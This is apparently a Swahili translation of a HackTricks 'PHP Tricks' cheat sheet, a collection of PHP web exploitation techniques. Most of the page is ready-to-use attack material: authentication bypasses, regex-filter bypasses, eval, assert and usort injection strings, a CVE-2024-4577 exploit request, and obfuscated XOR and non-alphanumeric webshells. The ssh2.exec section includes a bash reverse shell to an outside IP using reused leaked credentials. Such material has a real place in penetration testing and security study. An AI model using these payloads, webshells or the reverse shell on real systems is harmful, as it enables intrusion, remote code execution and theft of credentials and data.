PHP Tricks

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Cookies mahali pa kawaida:

Hii pia inatumika kwa phpMyAdmin cookies.

Cookies:

PHPSESSID
phpMyAdmin

Maeneo:

/var/lib/php/sessions
/var/lib/php5/
/tmp/
Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e

Ikiwa == inatumiwa katika PHP, kuna matukio yasiyotegemewa ambapo ulinganisho hautendeki kama inavyotarajiwa. Hii ni kwa sababu “==” inalinganisha tu thamani zilizobadilishwa kuwa aina ile ile; kama pia unataka kulinganisha kwamba aina ya data inayolinganishwa ni ile ile unapaswa kutumia ===.

PHP comparison tables: https://www.php.net/manual/en/types.comparisons.php

"string" == 0 -> True Kamba ambayo haianzi na namba inalingana na namba
"0xAAAA" == "43690" -> True Strings zilizotengenezwa kwa nambari katika muundo wa dec au hex zinaweza kulinganishwa na nambari/strings nyingine na kupata True kama matokeo ikiwa nambari zilikuwa sawa (nambari ndani ya string zinafafanuliwa kama nambari)
"0e3264578" == 0 --> True Kamba inaanza na “0e” na ikifuatiwa na chochote italingana na 0
"0X3264578" == 0X --> True Kamba inaanza na “0” ikifuatiwa na herufi yoyote (X inaweza kuwa herufi yoyote) na ikifuatiwa na chochote italingana na 0
"0e12334" == "0" --> True Hii ni ya kuvutia kwa sababu katika baadhi ya kesi unaweza kudhibiti pembejeo ya kamba ya “0” na baadhi ya yaliyomo yanayohashiwa na kulinganishwa nayo. Kwa hivyo, ikiwa unaweza kutoa thamani itakayounda hash inaanza na “0e” na bila herufi yoyote, unaweza kupita ulinganisho. Unaweza kupata strings zilizo hashed tayari kwa muundo huu hapa: https://github.com/spaze/hashes
"X" == 0 --> True Herufi yoyote ndani ya kamba inalingana na int 0

Taarifa zaidi katika https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09

in_array()

Type Juggling pia inaathiri function ya in_array() kwa chaguo-msingi (unahitaji kuweka hoja ya tatu kuwa true ili kufanya ulinganisho kali):

$values = array("apple","orange","pear","grape");
var_dump(in_array(0, $values));
//True
var_dump(in_array(0, $values, true));
//False

strcmp()/strcasecmp()

Ikiwa kazi hii inatumiwa kwa ukaguzi wowote wa uthibitishaji (kama kukagua password) na mtumiaji anasimamia upande mmoja wa kulinganisha, anaweza kutuma array tupu badala ya string kama thamani ya password (https://example.com/login.php/?username=admin&password[]=) na kupitisha ukaguzi huu:

if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password

Hitilafu ile ile hutokea na strcasecmp()

Strict type Juggling

Hata kama === inatumika, bado kunaweza kuwa na makosa yanayofanya ulinganisho kuwa nyeti kwa type juggling. Kwa mfano, ikiwa ulinganisho unafanya kubadilisha data kuwa aina tofauti ya kitu kabla ya kulinganisha:

(int) "1abc" === (int) "1xyz" //This will be true

preg_match(/^.*/)

preg_match() inaweza kutumika kuhakiki user input (huangalia kama neno/regex yoyote kutoka kwenye blacklist iko kwenye user input na ikiwa haipo, code inaweza kuendelea kutekeleza).

New line bypass

Hata hivyo, wakati ukiteua mwanzo wa regexp preg_match() huangalia tu mstari wa kwanza wa user input, hivyo ikiwa kwa namna fulani unaweza kutuma user input katika mistari kadhaa, unaweza kuweza bypass ukaguzi huu. Mfano:

$myinput="aaaaaaa
11111111"; //Notice the new line
echo preg_match("/1/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/1.*$/",$myinput);
//1  --> In this scenario preg_match find the char "1"
echo preg_match("/^.*1/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"
echo preg_match("/^.*1.*$/",$myinput);
//0  --> In this scenario preg_match DOESN'T find the char "1"

Ili kuepuka ukaguzi huu unaweza kutuma thamani ikiwa mistari mipya zime-urlencoded (%0A) au ikiwa unaweza kutuma JSON data, itume katika mistari kadhaa:

{
"cmd": "cat /etc/passwd"
}

Angalia mfano hapa: https://ramadistra.dev/fbctf-2019-rceservice

bypass ya kosa la urefu

(Bypass hii ilijaribiwa, inaonekana, kwenye PHP 5.2.5 na sikuweza kuifanya ifanye kazi kwenye PHP 7.3.15)
Ikiwa unaweza kutuma kwa preg_match() ingizo halali lenye urefu mkubwa, haitaweza kuisindika na utaweza bypass ukaguzi. Kwa mfano, ikiwa inafanya blacklisting ya JSON unaweza kutuma:

payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'

From: https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0

ReDoS Bypass

Trick from: https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223 and https://mizu.re/post/pong

Kwa ufupi, tatizo linatokea kwa sababu preg_* functions katika PHP zinajengwa juu ya PCRE library. Katika PCRE baadhi ya regular expressions hufananishwa kwa kutumia wito mwingi za rekursi, ambazo hutumia nafasi kubwa ya stack. Inawezekana kuweka kikomo kwa idadi ya recursions zinazoruhusiwa, lakini katika PHP kikomo hiki defaults to 100.000 ambacho ni zaidi ya kinachoweza kufaa kwenye stack.

This Stackoverflow thread pia ilihusishwa kwenye chapisho ambapo suala hili lilizungumziwa kwa undani zaidi. Jukumu letu sasa lilikuwa wazi:
Tuma input itakayofanya regex ifanye 100_000+ recursions, kusababisha SIGSEGV, kufanya preg_match() function irudishe false na hivyo kufanya application ianze kudhani kuwa input yetu sio hatari, na kutupa mshangao mwishoni mwa payload kitu kama {system(<verybadcommand>)} kupata SSTI –> RCE –> flag :).

Sawa, kwa istilahi za regex, hatufanyi kwa kweli 100k “recursions”, bali tunahesabu “backtracking steps”, ambazo kama inavyoelezwa na PHP documentation zinafanya default kuwa 1_000_000 (1M) katika variable pcre.backtrack_limit.\
Ili kufikia hilo, 'X'*500_001 itasababisha 1 million backtracking steps (500k forward and 500k backwards):

payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"

Type Juggling kwa PHP obfuscation

$obfs = "1"; //string "1"
$obfs++; //int 2
$obfs += 0.2; //float 2.2
$obfs = 1 + "7 IGNORE"; //int 8
$obfs = "string" + array("1.1 striiing")[0]; //float 1.1
$obfs = 3+2 * (TRUE + TRUE); //int 7
$obfs .= ""; //string "7"
$obfs += ""; //int 7

Execute After Redirect (EAR)

Ikiwa PHP inafanya redirect kwa ukurasa mwingine lakini hakuna kazi ya die au exit inayoitwa baada ya header Location kuwekwa, PHP inaendelea kutekeleza na kuongeza data kwenye body:

<?php
// In this page the page will be read and the content appended to the body of
// the redirect response
$page = $_GET['page'];
header('Location: /index.php?page=default.html');
readfile($page);
?>

Path Traversal and File Inclusion Exploitation

Angalia:

File Inclusion/Path traversal

Mbinu zaidi

register_globals: Katika PHP < 4.1.1.1 au ikiwa imepangwa vibaya, register_globals inaweza kuwa hai (au tabia yake inafikiwa kwa kuiga). Hii ina maana kwamba katika vigezo vya global kama $_GET ikiwa vina thamani mfano $_GET["param"]="1234", unaweza kuvitumia kupitia $param. Kwa hivyo, kwa kutuma vigezo vya HTTP unaweza kuandika upya variables zinazotumika ndani ya code.
PHPSESSION cookies of the same domain are stored in the same place, kwa hiyo ikiwa ndani ya domain different cookies are used in different paths unaweza kufanya path moja accesses the cookie of the path kwa kuweka thamani ya cookie ya path nyingine.
Kwa njia hii ikiwa both paths access a variable with the same name unaweza kufanya thamani ya variable hiyo katika path1 itumike kwa path2. Na kisha path2 itachukulia kama halali variables za path1 (kwa kumpa cookie jina linalolingana nalo katika path2).
Wakati una usernames za watumiaji wa mashine, angalia anwani: /~<USERNAME> kuona kama saraka za php zimewashwa.
Ikiwa config ya php ina register_argc_argv = On basi query params zilizo tangamana kwa nafasi zinatumika kujaza array ya arguments array_keys($_SERVER['argv']) kana kwamba ni arguments kutoka CLI. Hii ni ya kuvutia kwa sababu ikiwa setting hiyo iko Off, thamani ya argv array itakuwa Null inapoitwa kutoka web kama array ya args haitajazwa. Kwa hivyo, ikiwa ukurasa wa wavuti unajaribu kuangalia ikiwa inaendesha kama web au kama zana ya CLI kwa kulinganisha kama if (empty($_SERVER['argv'])) { mshambuliaji anaweza kutuma parameters katika GET request kama ?--configPath=/lalala na utafikiri inaendesha kama CLI na huenda ikasoma na kutumia arguments hizo. Maelezo zaidi katika maandishi ya awali.
LFI and RCE using php wrappers

password_hash/password_verify

Hizi functions kwa kawaida zinatumika katika PHP kutengeneza hashes kutoka kwa passwords na kuangalia kama password ni sahihi ikilinganishwa na hash.
Algorithms zinazotumika ni: PASSWORD_DEFAULT na PASSWORD_BCRYPT (huanza na $2y$ ). Kumbuka kwamba PASSWORD_DEFAULT mara nyingi ni sawa na PASSWORD_BCRYPT. Na kwa sasa, PASSWORD_BCRYPT ina kizuizi cha ukubwa kwenye input cha 72bytes. Kwa hivyo, unapojaribu ku-hash kitu kilicho zaidi ya 72bytes kwa kutumia algorithm hii, tu 72B za kwanza ndizo zitakazotumika:

$cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
False

$cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
True

Bypass ya HTTP headers kwa kutumia makosa ya PHP

Kusababisha kosa baada ya kuweka headers

Kutoka kwenye thread hii ya Twitter unaona kwamba kutuma zaidi ya 1000 GET params au 1000 POST params au faili 20, PHOP haitakuwa ikiweka headers kwenye response.

Hii inaruhusu kupita, kwa mfano CSP headers zinazowekwa katika msimbo kama:

<?php
header("Content-Security-Policy: default-src 'none';");
if (isset($_GET["xss"])) echo $_GET["xss"];

Kujaza response body kabla ya kuweka headers

Ikiwa ukurasa wa PHP unaochapisha errors na echoing back some input provided by the user, user anaweza kufanya server ya PHP iprint tena some content long enough ili wakati itakapojaribu add the headers kwenye response server itatoa error.
Katika mfano ufuatao mshambuliaji alifanya server itoke na makosa makubwa, na kama unavyoona kwenye skrini php ilipopojaribu modify the header information, it couldn’t (kwa mfano CSP header haikutumwa kwa user):

SSRF in PHP functions

Angalia ukurasa:

PHP SSRF

ssh2.exec stream wrapper RCE

When the ssh2 extension is installed (ssh2.so visible under /etc/php*/mods-available/, php -m, or even an FTP-accessible php8.1_conf/ directory), PHP registers ssh2.* wrappers that can be abused anywhere user input is concatenated into fopen()/file_get_contents() targets. An admin-only download helper such as:

$wrapper = strpos($_GET['format'], '://') !== false ? $_GET['format'] : '';
$file_content = fopen($wrapper ? $wrapper . $file : $file, 'r');

inatosha kutekeleza shell commands kupitia localhost SSH:

GET /download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1:22/ping%2010.10.14.6%20-c%201#

Sehemu ya credential inaweza kutumia tena leaked system password yoyote (e.g., from cracked bcrypt hashes).
Alama inayofuata # inaweka server-side suffix (files/<id>.zip) kama comment, hivyo tu amri yako ndiyyo inatekelezwa.
Blind RCE inathibitishwa kwa kutazama egress kwa kutumia tcpdump -ni tun0 icmp au kwa kuhudumia HTTP canary.

Badilisha amri kwa reverse shell payload mara itakapothibitishwa:

format=ssh2.exec://yuri:mustang@127.0.0.1:22/bash%20-c%20'bash%20-i%20>&%20/dev/tcp/10.10.14.6/443%200>&1'#

Kwa sababu kila kitu kinatokea ndani ya PHP worker, muunganisho wa TCP unatoka kwa lengo na unarithi vibali vya akaunti iliyochomwa (yuri, eric, n.k.).

Utekelezaji wa msimbo

system(“ls”);
ls;
shell_exec(“ls”);

Check this for more useful PHP functions

RCE via preg_replace()

preg_replace(pattern,replace,base)
preg_replace("/a/e","phpinfo()","whatever")

Ili kutekeleza code katika hoja “replace” inahitajika angalau mechi moja.
Chaguo hili la preg_replace limepitwa na wakati tangu PHP 5.5.0.

RCE via Eval()

'.system('uname -a'); $dummy='
'.system('uname -a');#
'.system('uname -a');//
'.phpinfo().'
<?php phpinfo(); ?>

RCE via Assert()

Kazi hii ndani ya php inakuwezesha execute code that is written in a string ili return true or false (na kulingana na hili kubadilisha utekelezaji). Kawaida user variable itaingizwa katikati ya string. Kwa mfano:
assert("strpos($_GET['page']),'..') === false") –> Katika kesi hii ili kupata RCE unaweza kufanya:

?page=a','NeVeR') === false and system('ls') and strpos('a

Utahitaji kuvunja code sintaksia, kuongeza payload yako, na kisha kurekebisha tena. Unaweza kutumia operesheni za mantiki kama “and” au “%26%26” au “|”. Kumbuka kwamba “or”, “||” hazifanyi kazi kwa sababu ikiwa sharti la kwanza ni kweli payload yetu haitatekelezwa. Vivyo hivyo “;” haifanyi kazi kwani payload yetu haitatekelezwa.

Chaguo lingine ni kuongeza kwenye string utekelezaji wa amri: '.highlight_file('.passwd').'

Chaguo lingine (kama una msimbo wa ndani) ni kubadilisha baadhi ya variable ili kubadilisha utekelezaji: $file = "hola"

RCE via usort()

Funksioni hii inatumiwa kupanga array ya vitu kwa kutumia funksioni maalum.
Ili kutumia vibaya funksioni hii:

<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#

<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>

<?php
function foo($x,$y){
usort(VALUE, "cmp");
}?>
VALUE: );}[PHP CODE];#

<?php
function foo($x,$y){
usort();}phpinfo;#, "cmp");
}?>

Unaweza pia kutumia // kutaja maelezo kwa sehemu iliyobaki ya code.

Ili kugundua idadi ya mabano unayohitaji kufunga:

?order=id;}//: tunapata ujumbe wa kosa (Parse error: syntax error, unexpected ';'). Inawezekana tunakosa bango moja au zaidi.
?order=id);}//: tunapata onyo. Hii inaonekana sawa.
?order=id));}//: tunapata ujumbe wa kosa (Parse error: syntax error, unexpected ')' i). Inawezekana tuna mabano za kufunga nyingi.

RCE kupitia .httaccess

Ikiwa unaweza kupakia .htaccess, basi unaweza kusanidi mambo kadhaa na hata kuendesha code (kwa kusanidi kwamba faili zenye extension .htaccess zinaweza kuendeshwa).

Shells tofauti za .htaccess zinaweza kupatikana here

RCE kupitia Env Variables

Ikiwa utakutana na udhaifu unaokuruhusu kubadilisha env variables katika PHP (na mwingine wa kupakia faili, ingawa kwa utafiti zaidi labda hii inaweza kupitishwa), unaweza kutumia tabia hii kupata RCE.

LD_PRELOAD: env variable hii inakuwezesha kupakia maktaba yoyote unayotaka unapoendesha binaries nyingine (ingawa katika kesi hii inaweza isifanye kazi).
PHPRC : Inaelekeza PHP wapi kupata faili yake ya usanidi, kawaida inaitwa php.ini. Ikiwa unaweza kupakia faili yako ya usanidi, tumia PHPRC kumwelekeza PHP. Ongeza kipengele cha auto_prepend_file kikieleze faili ya pili uliyoipakia. Faili hii ya pili ina PHP code ya kawaida, ambayo baadaye inatekelezwa na runtime ya PHP kabla ya code nyingine yoyote.

Pakia faili ya PHP inayojumuisha shellcode yetu
Pakia faili ya pili, yenye directive ya auto_prepend_file inayoelekeza preprocessor ya PHP kutekeleza faili tuliolipakia katika hatua ya 1
Weka variable ya PHPRC kuwa faili tuliolipakia katika hatua ya 2.

Pata maelezo zaidi jinsi ya kutekeleza mnyororo huu kutoka kwenye ripoti ya awali.
PHPRC - chaguo jingine
Ikiwa huwezi kupakia faili, unaweza kutumia katika FreeBSD “file” /dev/fd/0 ambayo ina stdin, kwa kuwa ni mwili wa ombi lililotumwa kwa stdin:
curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
Au ili kupata RCE, wezesha allow_url_include na uanze faili iliyopendekezwa (prepend) yenye base64 PHP code:
curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
Mbinu kutoka kwenye ripoti hii.

XAMPP CGI RCE - CVE-2024-4577

The webserver parses HTTP requests and passes them to a PHP script executing a request such as as http://host/cgi.php?foo=bar as php.exe cgi.php foo=bar, which allows a parameter injection. This would allow to inject the following parameters to load the PHP code from the body:

-d allow_url_include=1 -d auto_prepend_file=php://input

Zaidi ya hayo, inawezekana kuingiza param ya “-” kwa kutumia karakteri 0xAD kutokana na usawazishaji wa baadaye wa PHP. Angalia mfano wa exploit kutoka this post:

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

PHP Sanitization bypass & Brain Fuck

In this post inawezekana kupata mawazo mazuri ya kuunda Brain Fuck PHP code wakati herufi (chars) chache zinaruhusiwa.
Zaidi ya hayo, pia imependekezwa njia ya kuvutia ya execute functions ambayo iliwawezesha bypass several checks:

(1)->{system($_GET[chr(97)])}

PHP Static analysis

Angalia ikiwa unaweza kuingiza code kwenye miito ya functions hizi (kutoka here):

exec, shell_exec, system, passthru, eval, popen
unserialize, include, file_put_cotents
$_COOKIE | if #This mea

If you are debugging a PHP application you can globally enable error printing in /etc/php5/apache2/php.ini adding display_errors = On and restart apache : sudo systemctl restart apache2

Deobfuscating PHP code

Unaweza kutumia tovuti www.unphp.net to deobfuscate php code.

PHP Wrappers & Protocols

PHP Wrappers and protocols zinaweza kukuwezesha bypass write and read protections katika mfumo na kuiathiri vibaya. For more information check this page.

Xdebug unauthenticated RCE

Ikiwa unaona kwamba Xdebug imewezeshwa katika phpconfig() output unapaswa kujaribu kupata RCE via https://github.com/nqxcode/xdebug-exploit

Variable variables

$x = 'Da';
$$x = 'Drums';

echo $x; //Da
echo $$x; //Drums
echo $Da; //Drums
echo "${Da}"; //Drums
echo "$x ${$x}"; //Da Drums
echo "$x ${Da}"; //Da Drums

$_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);

XOR

$_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source
$__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd
$___=$__; #Could be not needed inside eval
$_($___); #If ¢___ not needed then $_($__), show_source(.passwd)

XOR easy shell code

Kulingana na this writeup yafuatayo inawezekana kuunda shellcode rahisi kwa njia hii:

$_="`{{{"^"?<>/"; // $_ = '_GET';
${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);

Kwa hivyo, ikiwa unaweza execute arbitrary PHP without numbers and letters unaweza kutuma ombi kama lifuatalo ukiitumia payload hiyo kutekeleza execute arbitrary PHP:

POST: /action.php?_=system&__=cat+flag.php
Content-Type: application/x-www-form-urlencoded

comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);

Kwa maelezo ya kina zaidi angalia https://ctf-wiki.org/web/php/php/#preg_match

XOR Shellcode (inside eval)

#!/bin/bash

if [[ -z $1 ]]; then
echo "USAGE: $0 CMD"
exit
fi

CMD=$1
CODE="\$_='\

lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='

lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"

Perl kama

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

Marejeo

0xdf – HTB Era: abusing ssh2.exec stream wrappers

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.